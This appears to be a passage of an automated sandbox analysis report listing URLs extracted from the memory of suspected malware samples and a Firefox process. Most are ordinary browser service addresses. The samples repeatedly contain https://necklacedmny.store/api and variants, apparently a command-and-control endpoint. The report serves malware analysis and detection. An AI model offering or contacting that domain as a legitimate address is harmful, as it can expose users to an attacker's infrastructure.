Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000002E.00000003.3006812484.0000020F30DC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2979347381.0000020F2CA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3010408169.0000020F30DC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: b76bb5cee7.exe, 0000000A.00000003.2721535335.00000000050CB000.00000004.00001000.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766160676.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000002.2961232929.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000003.2862123172.000000000524B000.00000004.00001000.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2875624155.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num.exe, 00000030.00000000.3003390032.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num[1].exe.5.dr, num.exe.5.dr String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 0000002E.00000003.2981399452.0000020F2FD43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drafts.csswg.org/css-lists-3/#ua-stylesheet
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2900846239.0000025E4238C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000002E.00000003.3061422895.0000020F386FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000002E.00000003.3060467793.0000020F3AC5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabresource://activity-stream/lib/ActivityStreamMe
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreresource://gre/modules/XPCOMUtils.sys.mjs
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreresource://gre/modules/XPCOMUtils.sys.mjschrome://gl
Source: firefox.exe, 0000002E.00000003.3053774318.0000020F382CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000002E.00000003.3053774318.0000020F382CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000002E.00000003.2981399452.0000020F2FD43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/1072
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/discoverystream.personalization.enabledresource://nimbus/Exper
Source: firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001C.00000002.2932128135.0000012157372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41C86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3022867414.0000020F30AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000002E.00000003.3022867414.0000020F30AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestPreferences/this._firefoxSuggestScenarioStartupPro
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://gre/modules/translation/LanguageDetecto
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000002E.00000003.2988145468.0000020F2F7E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/
Source: efe6fe4127.exe, 0000000C.00000003.2839354396.0000000001A59000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2895550351.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2822426933.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2932514636.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2937020002.00000000062C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000003.2232447339.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/3
Source: efe6fe4127.exe, 0000000C.00000003.2922319367.0000000001A75000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2922893958.0000000001A77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/6
Source: efe6fe4127.exe, 0000000C.00000003.2822426933.0000000001A56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/G
Source: efe6fe4127.exe, 00000009.00000003.2713360207.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/JV
Source: file.exe, 00000000.00000003.2336454706.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221874778.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/K
Source: file.exe, 00000000.00000003.2336454706.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/S
Source: file.exe, 00000000.00000003.2173560257.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174004545.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174156627.00000000052D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/Y
Source: file.exe, 00000000.00000003.2173560257.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174004545.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174156627.00000000052D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/a
Source: file.exe, file.exe, 00000000.00000003.2173921284.00000000052DE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221874778.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222056225.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336173364.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2232690229.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173836992.00000000052DA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221899920.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2158727601.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2232447339.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221768283.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, efe6fe4127.exe, 00000009.00000003.2713594540.00000000056D7000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2834293641.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2697164287.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2698088537.00000000056D7000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2697928533.00000000056D2000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2832811721.00000000056D2000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2648446108.0000000000B75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.2336173364.0000000000A69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api8f
Source: efe6fe4127.exe, 00000009.00000003.2832811721.00000000056D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiA
Source: efe6fe4127.exe, 00000009.00000003.2713594540.00000000056D7000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2697164287.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2698088537.00000000056D7000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2697928533.00000000056D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiu
Source: efe6fe4127.exe, 00000009.00000003.2725411254.00000000056D5000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2832811721.00000000056D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiw
Source: efe6fe4127.exe, 00000009.00000003.2725411254.00000000056D5000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2832811721.00000000056D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api~
Source: efe6fe4127.exe, 00000009.00000003.2693852054.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/bW
Source: efe6fe4127.exe, 00000009.00000003.2834778885.0000000000B82000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2831918485.0000000000B76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/mYgo3iF
Source: efe6fe4127.exe, 0000000C.00000003.2836024588.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2871436723.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2839354396.0000000001A59000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2822426933.0000000001A56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/o
Source: file.exe, 00000000.00000003.2336454706.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/s
Source: file.exe, 00000000.00000003.2173560257.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174004545.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174156627.00000000052D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/y
Source: file.exe, 00000000.00000003.2336374803.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store:443/api
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
